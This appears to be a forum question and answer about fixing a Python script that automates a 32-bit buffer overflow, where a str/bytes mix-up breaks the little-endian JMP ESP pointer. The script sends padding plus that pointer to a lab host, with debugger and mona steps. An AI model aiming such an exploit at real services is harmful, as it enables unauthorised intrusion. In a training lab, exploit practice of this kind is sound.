Sending escaped hex string in raw_input variable over socket doesn't work?

Apologies in advance. I know my code is sloppy and a bit hacky.

As some backstory, I am trying to write a menu-based script that automates every step of a 32-bit buffer overflow. I have automated most of the steps without any problems, but I am trying to append a series of escaped hex characters to my buffer before sending it (see the code below).

I have written the script for both Python 2.7 and Python 3 (using pwnlib for the p32 little-endian handling). I have since abandoned Python 3 because it seems a bit tedious for exploit writing. The problem I am running into is that the escaped hex characters stored in a string variable defined via raw_input are not sent correctly over the socket.

If I hardcode the escaped hex characters, the script works perfectly. I am sure I have read enough to understand that there is some kind of encoding issue, but I have been at this for a few days and at this point I am very frustrated.

Python 2.7

#!/usr/bin/env python2
import socket

def send_buf():
    global s

    while True:
        try:
            # connect to socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((RHOST, RPORT))

            # send buffer fuzz
            s.send(buf + "\n")
            # print out sent block
            print "Sent: {0}".format(buf)
            s.close()
            break
        except socket.error:
            print "Failed to connect to server."
            pause = raw_input("Press any key to continue...")

RHOST = "10.0.0.2"
RPORT = 31337
match_offset = 146
command = ""

print "[6] Finding the Right Module"
print 30 * "-", "README", 30 * "-"
print "Within Immunity Debugger, type the following: \n"
print "!mona modules \n"
print "Note the base address and module name for the module with least protections listed."
print "The idea here is to locate the JMP ESP address used by this module, and overwrite the EIP with that address."
# backslashes doubled so the instruction prints the text \xff\xe4 instead of two raw bytes
print "!mona find -s \"\\xff\\xe4\" -m <module_name>"

pointer = raw_input("Enter the pointer address used by the vulnerable module with least protections: ")
print pointer
print "Convert the string above to little endian. (I.E 0x080414c3 -> \\xc3\\x14\\x04\\x08) "

# raw_input() returns the typed backslashes literally: typing \xc3\x14\x04\x08 here
# yields a 16-character string, not the 4-byte string the hardcoded literal produces
le_pointer = raw_input("Little-endian: ")
#le_pointer = le_pointer.decode("unicode_escape")
buf = command + ("A" * match_offset) + le_pointer
print buf
send_buf()

Hardcoding le_pointer works just fine, but I want to understand why it does not work when the value comes from raw_input. Both objects are strings, so I have a fundamental misunderstanding somewhere.

I'm sure I will have to elaborate further, but I would appreciate any help that can solve this problem.

Is there a better solution for accepting a pointer address via user input (i.e. 0x080414c3), converting it to escaped hex, reversing the byte order (for little-endian architectures), and appending it to the send buffer in a way that can be sent correctly over the socket?

Hardcoding le_pointer like this works fine: le_pointer = "\xc3\x14\x04\x08"

For anyone struggling with the same or a similar task as mine, also having trouble with str/byte objects, or trying to convert a Python 2.7 exploit to Python 3, I found it best to convert all string objects to bytes via string.encode() and then just use those.

I achieved my goal by using Python 3 (as recommended by @tripleee), the pwntools module p32, converting all strings to bytes, and using those instead of the strings from Python 2.7.

Thanks to @tripleee and @steve for helping clear up some of my misunderstandings and for trying to help me solve this. Below is my revised code, in Python 3.

#!/usr/bin/env python3
import socket
from pwn import p32

def send_buf():
    global s

    while True:
        try:
            # connect to socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((RHOST, RPORT))

            # send buffer fuzz (buf is already bytes, newline included)
            s.send(buf)
            # print out sent block
            print("Sent: {0}".format(buf))
            s.close()
            break
        except socket.error:
            print("Failed to connect to server.")
            pause = input("Press any key to continue...")

RHOST = "10.0.0.41"
RPORT = 31337
match_offset = 146
command = ''.encode()

print("[6] Finding the Right Module")
print(30 * "-", "README", 30 * "-")
print("Within Immunity Debugger, type the following: \n")
print("!mona modules \n")

print("Note the base address and module name for the module with least protections listed.")

print("The idea here is to locate the JMP ESP address used by this module, and overwrite the EIP with that address.")

# backslashes doubled so the instruction prints the text \xff\xe4 instead of the characters those codes denote
print("!mona find -s \"\\xff\\xe4\" -m <module_name>")

# parse the typed address (e.g. 0x080414c3) as a hex integer rather than eval()ing arbitrary input
pointer = int(input("Enter the JMP ESP pointer address used by the vulnerable module with least protections: "), 16)

# p32 packs the integer as 4 little-endian bytes, so no escape sequences have to be typed
le_pointer = p32(pointer)
print(le_pointer)

newline = "\n".encode()
pad = ("A" * match_offset).encode()
pre_buf = command + pad
buf = pre_buf + le_pointer + newline

print(buf)
pause = input("Ensure immunity is running, attached, and breakpoint is configured to halt program upon JMP ESP trigger: ")
send_buf()
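The misunderstanding in the question and the fix in the answer both come down to one point: raw_input()/input() hand back the backslashes the user typed as ordinary characters, so the typed text `\xc3\x14\x04\x08` is a 16-character string, while the source literal "\xc3\x14\x04\x08" is 4 bytes. The following is an added, stand-alone example (not the asker's code and not pwntools); it uses the standard library's struct.pack("<I", ...) in place of p32() to turn a typed address into little-endian bytes, shows how to interpret already-typed escape text if that is what you have, and assembles the padding + pointer + newline buffer as bytes. The address and typed text are constructed sample values, and the function names are my own.

```python
import struct

# Constructed sample values (not from the question): the address a user would
# type, and the text input() actually returns when the escape sequence is typed.
TYPED_ADDRESS = "0x080414c3"
TYPED_ESCAPES = r"\xc3\x14\x04\x08"   # 16 characters of text, not 4 bytes


def address_to_le_bytes(text):
    """Parse a typed address such as '0x080414c3' (with or without the 0x
    prefix) and pack it as a 32-bit little-endian value, which is what the
    answer's p32() call does. Rejects anything that does not fit 32 bits."""
    value = int(text.strip(), 16)
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("address does not fit in 32 bits: %r" % text)
    return struct.pack("<I", value)


def escaped_text_to_bytes(text):
    """Interpret typed escape text like '\\xc3\\x14\\x04\\x08' into the 4 raw
    bytes the same sequence would produce as a source-code literal.
    input() keeps the backslashes verbatim, so the escapes must be decoded
    explicitly; latin-1 round-trips each code point to one byte."""
    return text.encode("latin-1").decode("unicode_escape").encode("latin-1")


def build_buffer(command, offset, pointer_bytes, newline=b"\n"):
    """Assemble command + padding + pointer + newline entirely as bytes and
    check that the pointer occupies exactly offset..offset+4, so a str/bytes
    mix-up or a mis-sized pointer is caught before anything is sent."""
    if len(pointer_bytes) != 4:
        raise ValueError("pointer must be exactly 4 bytes, got %d" % len(pointer_bytes))
    buf = command + b"A" * offset + pointer_bytes + newline
    start = len(command) + offset
    assert buf[start:start + 4] == pointer_bytes
    return buf


if __name__ == "__main__":
    # The typed escape text is four times longer than the bytes it names.
    print(len(TYPED_ESCAPES), repr(TYPED_ESCAPES))
    print(address_to_le_bytes(TYPED_ADDRESS))
    print(escaped_text_to_bytes(TYPED_ESCAPES))
    print(build_buffer(b"", 146, address_to_le_bytes(TYPED_ADDRESS)))
```

Because address_to_le_bytes() takes the plain address, the user never has to type escape sequences at all, which removes the encoding problem rather than working around it; escaped_text_to_bytes() is only there for the case where escape text is what you already have (it is the Python 3 equivalent of the commented-out unicode_escape line in the Python 2 script).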